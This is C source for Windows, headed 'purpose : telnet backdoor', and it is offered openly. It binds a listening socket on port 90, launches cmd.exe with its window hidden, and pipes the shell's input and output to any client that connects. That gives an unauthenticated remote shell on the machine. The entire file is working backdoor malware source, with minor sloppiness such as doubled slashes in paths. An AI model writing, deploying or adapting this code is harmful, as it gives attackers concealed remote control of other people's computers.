/****************************************************
created : 2004/10/09
created : 9:10:2004 9:37
file base : tini
file ext : c
author : XueFeng
purpose : telnet backdoor
****************************************************/
#include <stdio.h>
#include <winsock2.h>
#pragma comment(lib, "ws2_32.lib")
#pragma comment(lib, "kernel32.lib")
#define PORT 90
SOCKET ServerSocket = INVALID_SOCKET;
SOCKET ClientSocket = INVALID_SOCKET;
HANDLE hReadPipe, hWritePipe, hWriteFile, hReadFile;
unsigned char varA,varB;
//接收Telnet客户端信息
DWORD WINAPI ThreadFuncA(LPVOID lpParam)
{
SECURITY_ATTRIBUTES pipeattr;
DWORD nByteToWrite, nByteWritten;
char recv_buff[1024];
pipeattr.nLength = sizeof(SECURITY_ATTRIBUTES);
pipeattr.lpSecurityDescriptor = NULL;
pipeattr.bInheritHandle = TRUE;
//创建管道
CreatePipe(&hReadPipe, &hWriteFile, &pipeattr, 0);
varA = 1;
while(TRUE)
{
Sleep(250);
nByteToWrite = recv(ClientSocket, recv_buff, 1024, 0);
WriteFile(hWriteFile, recv_buff, nByteToWrite, &nByteWritten, NULL);
}
return 0;
}
//将命令的执行结果发往Telnet客户端
DWORD WINAPI ThreadFuncB(LPVOID lpParam)
{
SECURITY_ATTRIBUTES pipeattr;
DWORD len;
char send_buff[25000];
pipeattr.nLength = sizeof(SECURITY_ATTRIBUTES);
pipeattr.lpSecurityDescriptor = NULL;
pipeattr.bInheritHandle = TRUE;
CreatePipe(&hReadFile, &hWritePipe, &pipeattr, 0);
varB = 1;
while (TRUE)
{
ReadFile(hReadFile, send_buff, 25000, &len, NULL);
send(ClientSocket, send_buff, len, 0);
}
return 0;
}
void main(void)
{
WSADATA WSAData;
struct sockaddr_in RemoteAddr;
DWORD dwThreadIdA, dwThreadIdB, dwThreadParam=0;
OSVERSIONINFO osvi;
PROCESS_INFORMATION processinfo;
STARTUPINFO startinfo;
char szAPP[256];
//创建Telnet服务,监听等待客户端连接
WSAStartup(MAKEWORD(2,2), &WSAData);
ServerSocket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
RemoteAddr.sin_family = AF_INET;
RemoteAddr.sin_port = htons(PORT);
RemoteAddr.sin_addr.S_un.S_addr = htonl(INADDR_ANY);
bind(ServerSocket, (LPSOCKADDR)&RemoteAddr, sizeof(RemoteAddr));
listen(ServerSocket, 5);
varA = 0;
varB = 0;
CreateThread(NULL, 0, ThreadFuncA, NULL, 0, &dwThreadIdA);
CreateThread(NULL, 0, ThreadFuncB, NULL, 0, &dwThreadIdB);
do
{
Sleep(250);
} while((varA || varB) == 0);
GetStartupInfo(&startinfo);
//设置后台进程属性
startinfo.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
startinfo.hStdInput = hReadPipe;
startinfo.hStdError = hWritePipe;
startinfo.hStdOutput = hWritePipe;
startinfo.wShowWindow = SW_HIDE;
osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
GetVersionEx(&osvi);
GetSystemDirectory(szAPP, MAX_PATH + 1);
if (osvi.dwPlatformId == 2)
{
strcat(szAPP, "//cmd.exe");
if (CreateProcess(szAPP, NULL, NULL, NULL, TRUE, 0, NULL, NULL, &startinfo,
&processinfo) == 0)
{
printf ("Create Process Error!/n");
return;
}
}
else
{
strcat(szAPP, "//command.exe");
CreateProcess(NULL, szAPP, 0, 0, TRUE, 0, 0, 0, &startinfo, &processinfo);
}
while (TRUE)
{
ClientSocket = accept(ServerSocket, NULL, NULL);
Sleep(250);
}
}